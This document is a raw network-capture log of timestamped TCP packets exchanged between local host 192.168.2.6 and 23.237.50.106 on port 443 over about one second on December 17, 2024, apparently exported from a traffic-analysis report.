                                      Dec 17, 2024 19:47:04.178594112 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.178602934 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.191016912 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.191040993 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.191104889 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.191123009 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.207823038 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.207840919 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.208113909 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.208127975 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.220690966 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.220706940 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.220861912 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.220881939 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.232969999 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.232989073 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.233002901 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.233028889 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.233047009 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.233064890 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.249815941 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.249849081 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.249908924 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.249924898 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.249963045 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.262336969 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.262357950 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.262408972 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.262418985 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.262461901 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.274909019 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.274929047 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.275027037 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.275033951 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.275199890 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.289644003 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.289659023 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.289757967 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.289763927 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.305705070 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.305794954 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.305802107 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.316291094 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.316356897 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.316365004 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.316414118 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.316425085 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.326658010 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.326719046 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.326730013 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.326741934 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.326772928 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.355144978 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.355247021 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.355375051 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.355376005 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.355397940 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.367707968 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.367728949 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.367887974 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.367887974 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.367893934 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.372307062 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.372327089 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.372375965 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.372381926 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.372412920 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.376640081 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.376693964 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.376718998 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.376724005 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.376756907 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.382622957 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.382711887 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.382718086 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.387022018 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.387087107 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.387092113 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.391547918 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.391618013 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.391623020 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.397484064 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.397552013 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.397557020 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.402426958 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.402496099 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.402501106 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.406450033 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.406516075 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.406521082 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.412211895 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.412285089 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.412290096 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.416893005 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.416979074 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.416985035 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.421967030 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.422044039 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.422049046 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.426280022 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.426381111 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.426400900 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.432501078 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.432580948 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.432586908 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.436850071 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.436933994 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.436939955 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.441024065 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.441098928 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.441103935 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.446578026 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.446650028 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.446655989 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.475833893 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.475944042 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.475949049 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.481066942 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.481077909 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.481148958 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.481153965 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.484678030 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.484689951 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.484749079 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.484755039 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.543695927 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.547763109 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.547774076 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.547823906 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.547832966 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.547890902 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.550642967 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.550649881 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.550688982 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.550697088 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.550734997 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.552711010 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.552720070 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.552783012 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.552793026 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.555161953 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.555171013 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.555226088 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.555233955 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.558047056 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.558092117 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.558114052 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.558121920 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.558149099 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.560425997 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.560503960 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.560509920 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.562666893 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.562726021 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.562736988 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.565463066 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.565529108 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.565536022 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.567809105 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.567867041 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.567873001 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.570197105 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.570256948 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.570261955 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.572547913 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.572618008 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.572623014 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.575464964 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.575537920 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.575542927 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.577785969 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.577852964 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.577857018 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.579772949 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.579837084 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.579840899 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.582659960 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.582731009 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.582735062 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.584942102 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.585005045 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.585010052 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.631974936 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.739470959 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.739483118 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.739547968 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.739557028 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.741605997 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.741615057 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.741666079 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.741674900 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.744220018 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.744230986 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.744292021 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.744297981 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.746145010 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.746193886 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.746201992 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.746215105 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.746237993 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.748370886 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.748421907 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.748429060 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.750754118 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.750809908 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.750817060 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.752722025 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.752775908 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.752780914 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.754874945 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.754930019 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.754935026 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.757452965 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.757512093 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.757519007 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.759849072 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.759906054 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.759915113 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.761751890 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.761814117 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.761821032 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.763926983 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.764005899 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.764012098 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.766472101 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.766525030 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.766534090 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.768898964 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.768984079 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.768990040 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.770653009 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.770710945 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.770715952 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.772895098 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.772965908 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.772972107 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.823978901 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.932356119 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.932388067 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.932439089 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.932486057 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.932491064 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.933851004 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.933906078 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.933918953 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.933959961 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.933989048 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.936378002 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.936448097 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.936455011 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.938337088 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.938407898 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.938412905 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.940406084 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.940471888 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.940478086 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.942914963 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.942984104 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.942989111 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.944967031 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.945034027 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.945039034 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.947011948 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.947074890 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.947079897 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.949482918 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.949561119 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.949567080 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.951632023 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.951700926 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.951705933 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.953906059 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.953984976 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.953989983 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.955960989 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.956023932 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.956028938 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.958446026 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.958511114 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.958515882 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.960473061 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.960537910 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.960542917 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.962675095 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.962738037 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.962743044 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.965128899 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:04.965187073 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:04.965193033 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.016004086 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:05.125463009 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.125473976 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.125566006 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:05.125574112 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.128582001 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.128590107 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.128664970 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:05.128670931 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.130496979 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.130505085 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.130559921 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:05.130564928 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.132332087 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.132374048 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.132390022 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:05.132395029 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.132417917 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:05.134637117 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.134687901 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:05.134694099 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.136825085 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.136884928 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:05.136889935 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.138823986 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.138883114 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:05.138887882 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.140485048 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.140537977 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:05.140542984 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.142347097 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.142405987 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:05.142410994 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.144304991 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.144370079 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:05.144375086 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.145699024 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.145759106 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:05.145764112 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.148531914 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.148597002 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:05.148602009 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.150947094 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.151010036 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:05.151015997 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.153691053 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.153753996 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:05.153759003 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.155951023 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.156014919 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:05.156021118 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.157537937 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.157601118 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:05.157605886 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.207000017 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:05.323893070 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.323915005 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.323982954 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:05.324043036 CET49708443192.168.2.623.237.50.106
                                      Dec 17, 2024 19:47:05.324054956 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.325826883 CET4434970823.237.50.106192.168.2.6
                                      Dec 17, 2024 19:47:05.325891972 CET4434970823.237.50.106192.168.2.6
